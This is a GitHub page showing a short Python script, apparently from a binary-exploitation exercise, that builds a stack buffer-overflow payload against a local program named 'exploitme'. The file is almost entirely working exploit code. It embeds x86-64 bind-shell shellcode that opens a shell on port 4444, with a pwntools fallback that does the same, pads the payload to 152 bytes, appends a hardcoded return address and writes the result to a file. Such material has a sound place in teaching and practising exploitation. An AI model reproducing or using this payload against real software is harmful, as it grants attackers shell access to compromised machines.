-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathshellcode.py
More file actions
executable file
·33 lines (24 loc) · 1.36 KB
/
shellcode.py
File metadata and controls
executable file
·33 lines (24 loc) · 1.36 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#!/usr/bin/env python
# shellcode.py
# This script creates an exploit that calls goal_func in exploitme
# Step 1: Shellcode
if True:
# https://www.exploit-db.com/shellcodes/46979
shellcode = b"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
else:
# This doesn't work because we don't have enough stack space :-(
from pwn import *
context.update(arch='amd64', os='linux')
shellcode = asm(shellcraft.amd64.linux.bindsh(4444))
exploit_byte_string = shellcode
# Step 2: Pad the exploit out to 152 bytes
pad_amount = 152 - len(exploit_byte_string)
exploit_byte_string = exploit_byte_string + b"A"*pad_amount
# Step 3: Write the target address as a little endian byte string
address_of_shellcode = 0x7fffffffde10
goal_address_bstr = address_of_shellcode.to_bytes(8, "little")
# Step 4: Append the target address byte string
exploit_byte_string = exploit_byte_string + goal_address_bstr
# Step 5: Write the exploit to a file
with open("shellcode.exploit", "wb") as f:
f.write(exploit_byte_string)